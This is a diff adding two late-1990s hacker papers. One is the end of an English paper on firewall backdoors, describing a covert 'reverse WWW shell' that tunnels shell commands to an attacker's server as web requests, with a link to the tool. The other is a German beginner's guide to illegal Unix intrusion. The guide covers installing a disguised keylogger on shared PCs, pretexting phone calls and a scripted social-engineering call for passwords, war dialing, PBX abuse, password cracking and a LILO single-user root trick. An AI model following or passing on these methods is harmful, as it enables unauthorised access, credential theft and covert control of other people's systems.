+		 (re-)placing a cgi-script on the webserver of the company,
+                 which allows remote access. This is unlikely because it's
+                 rare that the webserver is in the network, not monitored/
+                 checked/audited and accessible from the internet. I hope
+                 nobody needs an example on such a thing ;-)<br>
+                 (re-placing) a service/binary on the firewall. This is
+                 dangerous because those are audited regulary and sometimes
+                 even sniffed on permanent ...<br>
+                 Loading a loadable module into the firewall kernel wich
+                 hides itself and gives access to it's master. The best
+                 solution for an active backdoor but still dangerous.
+</ul>
+        passive:<ul>
+		 E@mail - an email account/mailer/reader is configured in a
+                 way to extract hidden commands in an email (X-Headers with
+                 weird stuff) and send them back with output if wanted/needed.<br>
+                 WWW - this is hard stuff. A daemon on an internal machine
+                 does http requests to the internet, but the requests are
+                 in real the answers of commands which were issued by a
+                 rogue www server in a http reply. This nice and easy beast
+                 is presented below (-><A HREF="#example">Backdoor Example: The Reverse WWW Shell</A>)<br>
+                 DNS - same concept as above but with dns queries and
+                 replies. Disadvantage is that it can not carry much data.
+                 (<A HREF="http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz">http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz</A>, this
+                 example needs still much coding to be any effective)
+</ul>
+</ul></ul><p>
+
+<br><br><br><A NAME="example"></A>
+----[  Backdoor Example: The Reverse WWW Shell
+<p>
+This backdoor should work through any firewall which has got the security
+policy to allow users to surf the WWW (World Wide Waste) for information
+for the sake and profit of the company.<br>
+For a better understanding take a look at the following picture and try
+to remember it onwards in the text:
+<pre>
+ +--------+                    +------------+              +-------------+
+ |internal|--------------------|  FIREWALL  |--------------|server owned |
+ |  host  |  internal network  +------------+   internet   |by the hacker|
+ +--------+                                                +-------------+
+   SLAVE                                                        MASTER
+</pre>
+Well, a program is run on the internal host, which spawns a child every day
+at a special time. For the firewall, this child acts like a user, using his
+netscape client to surf on the internet. In reality, this child executes
+a local shell and connects to the www server owned by the hacker on the
+internet via a legitimate looking http request and sends it ready signal.
+The legitimate looking answer of the www server owned by the hacker are
+in reality the commands the child will execute on it's machine it the
+local shell. All traffic will be converted (I'll not call this "encrypted",
+I'm not Micro$oft) in a Base64 like structure and given as a value for
+a cgi-string to prevent caching.
+<pre>
+Example of a connection:
+
+Slave
+GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj HTTP/1.0
+
+Master replies with
+g5mAlfbknz
+</pre><p>
+The GET of the internal host (SLAVE) is just the command prompt of the
+shell, the answer is an encoded "ls" command from the hacker on the
+external server (MASTER).
+Some gimmicks:<p>
+The SLAVE tries to connect daily at a specified time to the MASTER if
+wanted; the child is spawned because if the shell hangs for whatever
+reason you can check & fix the next day; if an administrator sees connects
+to the hacker's server and connects to it himself he will just see a
+broken webserver because there's a Token (Password) in the encoded
+cgi GET request; WWW Proxies (f.e. squid) are supported; program masks
+it's name in the process listing ...
+<p>
+Best of all: master & slave program are just one 260-lines perl file ...
+Usage is simple: edit rwwwshell.pl for the correct values,
+execute  "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl"
+on the MASTER just before it's time that the slave tries to connect.
+<p>
+Well, why coding it in perl? a) it was very fast to code, b) it's highly
+portable and c) I like it.
+If you want to use it on a system which hasn't got perl installed, search
+for a similar machine with perl install, get the a3 compiler from the perl
+CPAN archives and compile it to a binary. Transfer this to your target
+machine and run that one.
+<p>
+The code for this nice and easy tool is appended in the section THE CODE
+after my last words. If you've got updates/ideas/critics for it drop me an
+email. If you think this text or program is lame, write me at root@localhost.
+Check out <A HREF="http://www.thc.org">http://www.thc.org</A> for updates.
+<br><br><br>
+----[  The Source
+<p>
+Grab it here ...<p>
+<ul><A HREF="../releases/rwwwshell-2.0.pl.gz">rwwwshell v2.0</A></ul>
+
+
+<br><br><br>
+----[  Security
+<p>
+
+Now it's an interesting question how to secure a firewall to deny/detect
+this. It should be clear that you need a tight application gateway firewall
+with a strict policy. email should be put on a centralized mail server,
+and DNS resolving only done on the WWW/FTP proxies and access to WWW only
+prior proxy authentication. However, this is not enough. An attacker can
+tamper the mailreader to execute the commands extracted from the crypted
+X-Headers or implement the http authentication into the reverse www-shell
+(it's simple). Also checking the DNS and WWW logs/caches regulary with good
+tools can be defeated by switching the external servers every 3-20 calls
+or use aliases.
+<p>
+A secure solution would be to set up a second network which is
+connected to the internet, and the real one kept seperated - but tell
+this the employees ...
+A good firewall is a big improvement, and also an Intrusion Detection
+Systems can help. But nothing can stop a dedicated attacker.
+<p>
+
+<PRE>
+
+----[  Last Words
+
+Have fun hacking/securing the systems ...
+Greets to all guys who like + know me ;-) and especially to those good
+chummers I've got, you know who you are.
+
+Ciao...
+                van Hauser / [THC] - The Hacker's Choice
+
+
+For further interesting discussions you can email me at
+<A HREF="mailto:vh@reptile.rug.be">vh@reptile.rug.ac.be</A> with my public pgp key blow:
+
+Type Bits/KeyID    Date       User ID
+pub  2048/CDD6A571 1998/04/27 van Hauser / THC <vh@reptile.rug.ac.be>
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.3i
+
+mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU
+SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L
+XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC
+meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc
+QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq
+s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU
+SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD
+/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn
+CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYNOkUXgUQdPo69B04dl
+C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN
+1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ
+PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ
+2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X
+lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/
+Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI
+o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw==
+=MdzX
+-----END PGP PUBLIC KEY BLOCK-----
+</PRE>
+
+----[  THE END
+</BODY>
+</HTML>
+

Papers/h2h.htm

@@ -0,0 +1,2331 @@
+<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
+<html>
+<head>
+   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
+   <meta name="GENERATOR" content="Mozilla/4.51 [en] (X11; I; Linux 2.2.7 i686) [Netscape]">
+   <title>Human to Hacker Version 1.1</title>
+</head>
+<body bgcolor="#FFFFFF">
+
+<center>
+<h1>
+<font color="#FF0000">Vom Menschen zum Unix-Hacker</font></h1></center>
+
+<center>
+<h4>
+Author: TICK / THC</h4></center>
+
+<center>
+<h4>
+Last Update: 1999-07-04</h4></center>
+
+<center>
+<h4>
+<a href="mailto:T_I_C_K@gmx.net">Email: T_I_C_K@gmx.net</a></h4></center>
+
+<center>
+<h4>
+<img SRC="pic1.gif" ></h4></center>
+
+<p><br><a NAME="inhalt"></a>
+<h2>
+<font color="#990099">Inhaltsverzeichnis</font></h2>
+
+<ol>
+<li>
+<img SRC="godown.gif" height=10 width=14> <a href="#a0">Vorwort</a></li>
+
+<li>
+<img SRC="godown.gif" > <a href="#a1">Voraussetzungen</a></li>
+
+<li>
+<img SRC="godown.gif" > <a href="#a2">Wie bekomme ich (illegalen) Zugang
+zum Internet?</a></li>
+
+<li>
+<img SRC="godown.gif" > <a href="#a3">Die Literatur:</a></li>
+
+<br>Der unangenehme Teil
+<br>oder:
+<br>Der Schluessel zum Erfolg
+<li>
+<img SRC="godown.gif" > <a href="#a4">Wie komme ich weiter?</a></li>
+
+<li>
+<img SRC="godown.gif" > <a href="#a5">Wie rette ich meinen Arsch?</a></li>
+
+<li>
+<img SRC="godown.gif" > <a href="#a6">Ein paar Gedanken zum Sein eines
+Hackers</a></li>
+
+<li>
+<img SRC="godown.gif" > <a href="#a7">Yeah, time to become 31337.</a></li>
+
+<li>
+<img SRC="godown.gif" height=10 width=14> <a href="#a8">Ein Blick ueber
+die Schulter</a></li>
+
+<li>
+<img SRC="godown.gif" height=10 width=14> <a href="#a9">Persoenliche Sicherheit</a></li>
+
+<li>
+<img SRC="godown.gif" height=10 width=14> <a href="#a10">Letzte Worte</a></li>
+
+<li>
+<img SRC="godown.gif" height=10 width=14> <a href="#a11">Wichtige Links</a></li>
+
+<li>
+<a href="tools.html">Tools</a></li>
+</ol>
+
+<h3>
+
+<hr WIDTH="100%"></h3>
+<a NAME="a0"></a>
+<h3>
+<font color="#993399">Vorwort</font></h3>
+Auch wenn es fuer einen Anfaenger hart ist, aber ich werde gewisse Dinge
+wie NIS, Passwordcracker, Packetsniffer, et cetera nicht erklaeren; ich
+setze sie als bekannt voraus. Wenn du mit diesen Dingen arbeitest, dann
+wirst du sie verstehen, und in den Buechern/Docs werden sie haeufig auch
+erklaert.
+<p>Zeilen, die mit dem Groesser-als Zeichen '>' beginnen sind Eingaben
+(von dir).
+<br>Zeilen, die mit dem Kleiner-als Zeichen '&lt;' beginnen, stellen Ausgaben
+(z.B. von einem Programm) dar.
+<br>Befehle werden <b>fett</b> gedruckt, Captures <font color="#FF0000">rot</font>
+und Filenamen <font color="#33FF33">gruen</font> indiziert.
+<p>Bitte sendet alle Verbesserungen, Erweiterungen, Anregungen und <u>intelligenten</u>
+Fragen
+<br>an meine E-mail Adresse.
+<p>Dieses Paper soll <u>keine</u> Aufforderung zum Hacken sein!
+<p>For non-german guys:
+<br>Sorry, but I'm too lazy to translate this text to english.
+<br>But maybe sometimes I (or someone else) will.
+<br>&nbsp;
+<p><a NAME="a1"></a>
+<h3>
+<font color="#990099">Voraussetzungen</font></h3>
+Ja gut, die Voraussetzungen um Hacker zu werden.... also, das Wichtigste
+ist ein eiserner Wille; du musst Hacker werden wollen, mit jeder Zelle
+deines Koerpers ;) - aber nicht verkrampfen, denn dann wird der Fluss der
+Phantasie blockiert ;). Ein IQ >= 100 waer' auch ganz sinnvoll... hm, aja,
+'n Computer und 'n Modem... sind deine Hauptwerkzeuge. Du solltest in C
+programmieren koennen, da auf (fast) jedem Unix-System ein C- Compiler
+installiert ist und der groesste Teil der Sourcecodes in C geschrieben
+ist. Ich werde im Verlauf dieses Artikels ein Buch vorstellen, das meiner
+Meinung nach eine sehr gute und umfassende Grundlage fuer's Programmieren
+in C bietet, falls du schon eine Hochsprache beherrschst und dir einiges
+zutraust, dann reicht es, ein Buch ueber Unix Systemprog. zu lesen.
+<br>Desweiteren ist es sinnvoll ein Unix auf deinem Rechner zu installieren,
+z.B. Linux (fuer Anfaenger wuerde ich SuSE Linux empfehlen, es ist gut
+dokumentiert und zudem einfach zu installieren) oder FreeBSD (ist im Gegensatz
+zu Linux ein echtes Unix, da es von den urspruenglichen Quellen abstammt).
+Es gibt noch weitere Unixes fuer x86er wie BSDI, OpenBSD (sehr sicher und
+user-unfreundlich... ein echtes Maenner-Betriebssystem *G*), Solaris x86,
+SCO etc. aber das braucht dich ersteinmal nicht zu interessieren. ;-)
+<p>Bis du ein erfahrener Hacker bist koennen selbst bei grossem Engagement
+einige Jahre vergehen.
+<br>&nbsp;
+<p><a NAME="a2"></a>
+<h3>
+<font color="#990099">Wie bekomme ich (illegalen) Zugang zum Internet?</font></h3>
+Also mir kommen jetzt mehrere Moeglichkeiten in den Sinn, ich werde mal
+mit der Methode beginnen, die ich auch verwendet habe - sozusagen die,
+die ihren Praxistest schon bestanden hat.
+<p>Such dir eine nette Uni (Internet Provider, Firma mit Internet-Access)
+in deiner Naehe aus und mache dort ein Praktikum, einen Ferienjob oder
+einen Nebenjob.
+<br>Waehrend deiner Taetigkeit immer schoen die Augen nach Rechnern offenhalten,
+die ans Uni-Netz angeschlossen sind, die von den Studenten genutzt werden
+und allgemein zugaenglich sind. Haeufig steht irgendwo ein alter DOS- PC
+rum, oder es existieren PC-Pools. Such dir einen Rechner aus und sieh'
+dir seinen Aufbau genau an (<font color="#33FF33">autoexec.bat </font>&amp;
+<font color="#33FF33">config.sys</font>...).
+Beobachte wie er benutzt wird (laeuft er staendig, wird er nachts ausgeschaltet).
+Lass dich mal ganz
+<font color="#000000">plump</font> von 'nem Studenten
+in die Benutzung des Rechners einweisen. Dann benutze diesen Rechner fuer
+anonymous <i>FTP</i>,
+<i>HTTP</i> und den ganzen Kram, der kein Passwort
+erfordert, und wenn sich die Gelegenheit mal bietet, dann kopiere dir die
+<font color="#33FF33">autoexec.bat</font><font color="#000000">,</font><font color="#33FF33">config.sys</font>
+und den Stammverzeichnisbaum (<b>tree</b>) auf 'ne Diskette.
+<br>Kommen wir jetzt zum spannenden Teil. Es geht darum ein <i>TSR</i>-Programm
+zu installieren, welches die Tastatureingaben in eine Datei protokolliert
+. Um dieses <i>TSR</i>-Prog. so gut wie moeglich zu verstecken tarnt man
+es als ein anderes Prog. und fuegt einen entsprechenden Eintrag in die
+<font color="#33FF33">autoexec.bat</font>
+ein. Man kann z.B. den Mouse-Treiber durch einer Batch-Datei ersetzen,
+die erst unser <i>TSR</i> und dann den Mouse-Treiber aufruft o. ae.. Wenn
+du fit in ASM-Programmierung bist, dann kannst du das <i>TSR</i> vor
+<b>mem</b>
+verstecken (ich glaube, indem man irgendwie 'ne Memorygrenze veraendert
+- keine Ahnung).
+<br>Unter Umstaenden muss man das <i>TSR</i> mit einem HEX-Editor seinen
+Anforderungen anpassen. Du solltest bedenken, dass die Protokolldatei den
+ganzen Plattenplatz aufzehren koennte, also taeglich die Datei auf Diskette
+bringen und von der Platte entfernen. Desweiteren muessen die Timestamps
+angepasst werden - ja, Paranoia ist die Lebensversicherung eines Hackers.
+<br>So, um die ganze Angelegenheit zu beschleunigen tippe jeweils eine
+Batch-Datei fuer die Installation des <i>TSR</i>s, fuer das <b>move</b>'n
+der Protokolldatei und zum Deinstallieren des <i>TSR</i>s und zur Wiederherstellung
+des Orginalzustandes (Timestamps nicht vergessen). Teste deine Strategie
+und deine Batch-Dateien auf deinem Rechner, in der Praxis darf es keine
+Fehler mehr geben, alles muss schnell und reibungslos verlaufen.
+<p><u>Interpretation der Protokolldatei:</u>
+<br>Wenn du z.B. folgendes siehst:
+<br><font color="#FF0000">ftp blah.am.arsch.de</font>
+<br><font color="#FF0000">franz</font>
+<br><font color="#FF0000">schwanz</font>
+<br>... dann existiert auf dem Rechner "blah.am.arsch.de" ein Account mit
+dem Login "franz" und den Passwort "schwanz" - vorausgesetzt, dass die
+Eingaben richtig waren :).
+<br>Wichtig sind fuer dich erstmal die Rechner im Uni-Netz.
+<p>Wenn du ein paar Accounts gesammlt hast, musst du die Telefonnummer
+des Modems rausfinden, die dich mit dem Netz der Uni verbindet.
+<br>Die Nummer bekommst du ganz einfach: Ruf' bei der Uni an, gib dich
+als Student aus und frag' nach der Nummer - du musst sicher und ruhig sprechen.
+Haeufig steht die Nummer auch in 'nem Infoblatt vom Rechenzentrum (RZ)
+oder auf deren Web-Site.
+<br>Die Bequemlichkeit beim Verwalten und Verwenden von Account Informationen
+kommt dir beim Einloggen zugute, undzwar ist es (meistens) voellig egal
+auf welchem Rechner im Uni-Netz du landest, denn viele User verwenden das
+selbe Passwort auf mehreren Rechnern (auch in anderen Domains) oder es
+wird <i>NIS</i> (oder <i>NIS</i>+, <i>rdist</i>, <i>DCE</i>, <i>CORBA</i>
+etc) benutzt
+<br>So, wenn du in dem System bist, dann mache dich damit vertraut (in
+Uni-Systemen faellt man nicht so schnell auf).
+<br>Von der Uni aus, kannst du dann am Besten noch Domains hacken, die
+in deinem City-Tarif Bereich liegen um deine Telefonkosten zu verringern
+- auch wenn die gehackte Uni im City-Tarif Bereich ist, denn je mehr Einwahlpunkte
+du zum Internet hast um so besser.
+<br>Du kannst deine Telefongebueren auch sparen, indem du 'ne <i>PBX</i>
+hackst (im 0130/0800/0180*- Bereich oder von lokalen Firmen) oder durch
+<i>Blueboxing</i>
+- ist mir persoenlich zu gefaehrlich und zu auffaellig, da die Telekom
+gerne Phreaker kennen lernen will und <i>PBXs</i> meistens gute Intrusion
+Detection Systems besitzen. ;)
+<br>Bei Firmen ist die ganze Angelegenheit etwas gefaehrlicher als bei
+Universitaeten oder FHs.
+<p>Desweiteren kannst du natuerlich auch einfach in den Computer-Systemen
+Trojan-Horses einbringen oder ganz simpel den Leuten ueber die Schulter
+sehen, wenn sie sich in die Rechner einloggen.
+<p>Die "Experten" unter euch koennen einen <i>Vampire-Tap</i> oder einen
+Laptop mit Sniffer in deren Netz einbringen und so einfach die Account-Informationen
+aufzeichnen.
+<br>Der Vorteil des <i>Vampire-Taps</i> ist, dass es nicht durch Messgeraete
+entdeckt werden kann, die die Entfernung bis zum naechsten Ende/Bruch im
+Netzkabel messen.
+<p>Unter Windows (3.11) kannst du den Macrorecorder zur Aufzeichnug der
+Tastatureingaben verwenden... is' aber nicht so toll... mach deine eigenen
+Erfahrungen, es erfordert auf jeden Fall mehr Aufmerksamkeit von dir. Eine
+bessere Loesung ist da schon eine veraenderte <font color="#33FF33">WINSOCK.DLL</font>
+zu installieren, die alle Daten, die uebers Netz gehen aufzeichnet.
+<p>Natuerlich kannst du auch einen auf DOS, Win9? oder NT basierenden Sniffer
+verwenden.
+<p>Falls du schon einen Unix-/NT-Account hast, dann lad' dir einfach die
+Passwortdatei auf deinen Rechner und cracke die Passwoerter.
+<p>Oder ein temporaerer Freund mit Internet-Anschluss hilft dir weiter.
+;)
+<p>Wenn du physikalischen Zugriff auf einen Linux Rechner hast, der mit
+<i>LILO</i>
+gebootet wird,
+<br>dann tippe am <i>LILO</i>-Prompt hinter dem Bootlabel fuer Linux "init=/bin/bash
+rw" ein und der Rechner bootet im Single-User Mode und gibt dir eine root
+Shell ohne Passwortabfrage. Andernfalls kannst du den Rechner immer noch
+mit einer Bootdiskette hochfahren.
+<p>In der nach-Telekom-Monopol und Internet Aera bieten viele Telekomunikations-Firmen
+Internetzugaenge an, die einfach durch die Angabe der eigenen Bankverbindung
+o. ae. benutzt werden koennen. Am Besten ihr werft 'nen Blick in den <a href="salpeter.html">Artikel</a>
+von Salpeter (Kommentare hierzu bitte nicht an mich).
+<p>Und nun noch ein old-school Weg. Er erfordert weniger den technischen
+sondern mehr den physischen und mentalen Aufwand.
+<br>Such' dir ein/e Institut/Firma mit Internetanschluss (in deiner Stadt)
+aus. Jetzt musst du erstmal jedemenge Infos ueber dein Ziel sammeln, egal
+wie unwichtig sie erscheinen. Du brauchst z.B. den Namen des Admins und
+der User, Beziehungen zu anderen Instituten/Firmen. Um diese Dinge in Erfahrung
+zu bringen kannst du den Muell der Firma durchsuchen (sog. <i>Dumpster
+Diving</i>) oder dich mal 'n bisschen umhoeren. Jetzt nur noch die Modemnummer
+herausfinden:
+<br>Entweder einfach anrufen und als User ausgeben (wenn du den Namen eines
+Kunden hast, dann benutze ihn auch), der die Nummer vertroedelt hat, ausgeben
+oder den Telefonnummernbereich deines Ziels durchscannen.
+<br>Das Scannen geht wie folgt:
+<br>Du waehlst eine Nummer und horchst ob ein Modem dranhaengt - diese
+Aufgabe kann auch ein Prog. uebernehmen. Viele Firmen belegen mit ihren
+Tk-Anlagen (man koennte natuerlich auch die TK-Anlage zu seinem Vorteil
+manipulieren, aber dieses Thema soll nicht Bestandteil dieses Papers sein
+und wuerde auch viel zu weit fuehren) einen bestimmten Nummernbereich,
+z.B. eine 6stellige Nummer wobei die ersten 3 Zahlen statisch sind (z.B.
+911) und die letzten 3 Zahlen variieren (0 bis 999; wobei 0 meistens die
+Telefonzentrale, Pforte, etc ist). Nun waehlst du alle Nr. von 911-0 bis
+911-999 bis du ein Modem gefunden hast; falls du ein Anrufbeantworter entdeckst,
+dann versuche ihn zu hacken (weitere Infos).
+<br>Du kannst den Scan-Bereich einschraenken indem du dir die Durchwahlnummer
+des RZs, DVZs (Datenverarb. Zentrum) - oder wie sonst die Abteilung fuer
+die Rechnerverwaltung heisst - geben laesst und dann von dort startest
+(Bsp.: Durchwahl: 345, dann faengst du bei 911-300 an).
+<br>So jetzt Accounts besorgen.
+<br>Rufe einen User an - dabei solltest du folgendes beachten:
+<ol>
+<li>
+suche dir am Besten nur Frauen</li>
+
+<br>oder Jugendliche aus, da diese Personen leichtglaeubiger und techn.
+weniger versiert sind.
+<br>(<u>kein</u> Sexismus, reine Erfahrung :) )
+<li>
+keine direkten Mitarbeiter der Firma</li>
+
+<li>
+abends anrufen (zw. 19.00 und 21.00)</li>
+</ol>
+... so, nehmen wir mal an, dass der Admin der Firma HAQ_ME Mark Abene und
+der User Kathrin Mitnick heisst und gehen wir davon aus, dass du den Usernamen
+kennst, dann koennte ein Gespraech folgendermassen ablaufen:
+<pre>MA:&nbsp;&nbsp;&nbsp;&nbsp; Guten Abend, hier spricht Mark Abene, ich bin der Computer-Administrator
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; von HAQ_ME. Koennte ich wohl bitte Kathrin Mitnick sprechen?
+KM:&nbsp;&nbsp;&nbsp;&nbsp; Ja, am Apparat.
+MA:&nbsp;&nbsp;&nbsp;&nbsp; Oh gut, undzwar folgendes, wir hatten Gestern auf unserem Internet-Server
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; einen Gang-Bang und uns sind einige Daten dabei verloren gegangen, darunter
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; auch die Userdaten...
+KM:&nbsp;&nbsp;&nbsp;&nbsp; Oh Gott, wie schrecklich.
+MA:&nbsp;&nbsp;&nbsp;&nbsp; ... ja, ja, und ich hab' die Aufgabe die Daten von&nbsp;
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unseren Backupbaendern zu restaurieren und die User-Datenbank wieder
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; neu einzurichten.
+KM:&nbsp;&nbsp;&nbsp;&nbsp; Aha...
+MA:&nbsp;&nbsp;&nbsp;&nbsp; Um meine Aufgabe zu komplettieren und ihnen wieder die einwandfreie
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Benutzung ihres Internetzugangs zu gewaehrleisten muesste ich wissen
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ob sie ihren alten Usernamen, kathrin, wieder verwenden wollen.
+KM:&nbsp;&nbsp;&nbsp;&nbsp; Oh ja, natuerlich.
+MA:&nbsp;&nbsp;&nbsp;&nbsp; Ok,... und wie lautete ihr Passwort?
+KM:&nbsp;&nbsp;&nbsp;&nbsp; Was!? Mein Passwort, warum haben sie davon keine Sicherungskopien
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; angefertigt?
+MA:&nbsp;&nbsp;&nbsp;&nbsp; Oh, es ist schoen so sicherheitsbewusste User zu haben, aber leider
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; selten.
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Aufgrund unser hohen Sicherheitsansprueche wird von der User-
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Datenbank keine Kopie angefertig... stellen sie sich mal vor, dass
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; die Backupbaender gestohlen werden.
+KM:&nbsp;&nbsp;&nbsp;&nbsp; Oh ja, sie haben recht. Also gut mein Passwort war "nirhtak".
+MA:&nbsp;&nbsp;&nbsp;&nbsp; Ok, ... dankesehr.
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Aufwiederhoeren.
+KM:&nbsp;&nbsp;&nbsp;&nbsp; Tschuess.</pre>
+Viel geredet fuer nur ein einziges Wort, aber es hat sich gelohnt. Du musst
+jederzeit ernst und ruhig klingen. Dieses Gerede ist sog. <i>Social Engeneering</i>.
+<br>Sollte es, aus welchen Gruenden auch immer, nicht klappen, dann kannst
+du auch ein Prog. verwenden, das das Passwort raet. Vielleicht funktionieren
+auch sog. Default-Accounts (z.B. Login: guest &amp; Password: guest).
+<br>&nbsp;
+<p><a NAME="a3"></a>
+<h3>
+<font color="#990099">Die Literatur</font></h3>
+Nachfolgend findest du eine kleine Tabelle mit Buechern, die du lesen solltest.
+<br>&nbsp;
+<br>&nbsp;
+<center><table BORDER COLS=4 WIDTH="100%" NOSAVE >
+<tr>
+<td>
+<center><b>Autor&nbsp;</b></center>
+</td>
+
+<td>
+<center><b>Titel</b></center>
+</td>
+
+<td>
+<center><b>Verlag</b></center>
+</td>
+
+<td>
+<center><b>Kommentar</b></center>
+</td>
+</tr>
+
+<tr>
+<td>Gerhard Willms</td>
+
+<td>Das C-Grundlagen Buch</td>
+
+<td>Data Becker</td>
+
+<td>Das Fundament der C-Programmierung&nbsp;</td>
+</tr>
+
+<tr>
+<td>Nemeth, Snyder, Seebass, Hein</td>
+
+<td>Unix Systemadministration&nbsp;
+<br>Handbook&nbsp;</td>
+
+<td>Prentice Hall</td>
+
+<td>Meiner Meinung nach das beste Buch fuer Unix-&nbsp;
+<br>Systemadministration&nbsp;
+<br>(eine dt. Auflage ist auch erhaeltlich)&nbsp;</td>
+</tr>
+
+<tr>
+<td>W. Richard Stevens</td>
+
+<td>Programmierung in der Unix-Umgebung</td>
+
+<td>Addison-Wesley</td>
+
+<td>Mal wieder ein perfektes Werk.&nbsp;
+<br>Stevens schreibt die besten Buecher fuer Unix/Internet&nbsp;
+<br>Programmierung&nbsp;</td>
+</tr>
+
+<tr>
+<td>W. Richard Stevens</td>
+
+<td>Programmieren von Unix-Netzen</td>
+
+<td>Prentice Hall / Hanser</td>
+
+<td>2te Auflage</td>
+</tr>
+
+<tr>
+<td>W. Richard Stevens</td>
+
+<td>TCP/IP Illustrated Vol. 1/2/3</td>
+
+<td>Addison-Wesley</td>
+
+<td>Infos ueber das TCP/IP Protokol und dessen Implementierung&nbsp;
+<br>sehr wichtig</td>
+</tr>
+
+<tr>
+<td>Garfinkel und Spafford</td>
+
+<td>Practical Unix &amp; Internet Security</td>
+
+<td>O'Reilley</td>
+
+<td>Das beste Buch in Sachen Unix- &amp; Internet-&nbsp;
+<br>Sicherheit</td>
+</tr>
+
+<tr>
+<td>Chapman und Zwicky</td>
+
+<td>Einrichten von Internet-&nbsp;
+<br>Firewalls</td>
+
+<td>O'Reilley</td>
+
+<td>beschreibt den Aufbau von Firewalls&nbsp;
+<br>leider nicht uptodate aber trotzdem sehr gut</td>
+</tr>
+
+<tr>
+<td>Cheswick und Bellovin</td>
+
+<td>Firewalls und Sicherheit im Internet</td>
+
+<td>Addison-Wesley</td>
+
+<td>Ebenfalls Firewalls-&nbsp;
+<br>aufbau, aber etwas theoretischer&nbsp;
+<br>und zeigt uebersichtlich moegliche Schwaechen auf.&nbsp;</td>
+</tr>
+
+<tr>
+<td>Bruce Schneier</td>
+
+<td>Angewandte Kryptographie</td>
+
+<td>Addison-Wesley</td>
+
+<td>Bruce Schneier hat bei dem Buch ganze Arbeit geleistet. Es ist sehr
+gut zu lesen und enthaelt viele Informationen</td>
+</tr>
+
+<tr>
+<td>Electronic Frontier Foundation</td>
+
+<td>Cracking DES</td>
+
+<td>O'Reilley</td>
+
+<td></td>
+</tr>
+
+<tr>
+<td></td>
+
+<td>Linux-Kernel-Programmierung</td>
+
+<td>Addison-Wesley</td>
+
+<td>Wichtige Infos ueber den Linux-Kernel werden hier leicht erklaert.
+<br>Ganz nuetzlich, wenn du mal die Linux-Firewall evaluieren willst. ;)</td>
+</tr>
+</table></center>
+
+<p>Na? 'Ne Menge Papier. Aber es lohnt sich wirklich den ganzen Kram zu
+lesen, glaub mir. Es gibt auch einige wenige gute Docs von Admins und Hackern
+- sie ersetzen aber nicht ein gutes Buch.
+<br>Du solltest auch die Security-Papers lesen, die im COAST-Archiv oder
+bei RootShell liegen... und die USENIX-Veroeffentlichungen nicht zu vergessen.
+<br>&nbsp;
+<p><a NAME="a4"></a>
+<h3>
+<font color="#990099">Wie komme ich weiter?</font></h3>
+Du solltest dir einen legalen Internet-Zugang besorgen.
+<br>Anschliessend schreibst du dich in Unix- &amp; Internet-Security&nbsp;
+Mailinglisten ein. Hier werden Hinweise auf Bugs in Programmen und Diensten
+gegeben und zusaetzlich auch noch kleine C-Programme oder Shell/Perl-Skripte
+mitgeliefert, die diese Bugs ausnutzen.
+<br>Trotz dieser Bequemlichkeit solltest du die old-school Methoden wie
+Trojan- Horses, etc nicht vergessen bzw. selbst dein Gehirn benutzen.
+<br>&nbsp;
+<center><table BORDER NOSAVE >
+<tr NOSAVE>
+<th NOSAVE>Adresse&nbsp;</th>
+
+<th>Subject&nbsp;</th>
+
+<th>Body&nbsp;</th>
+</tr>
+
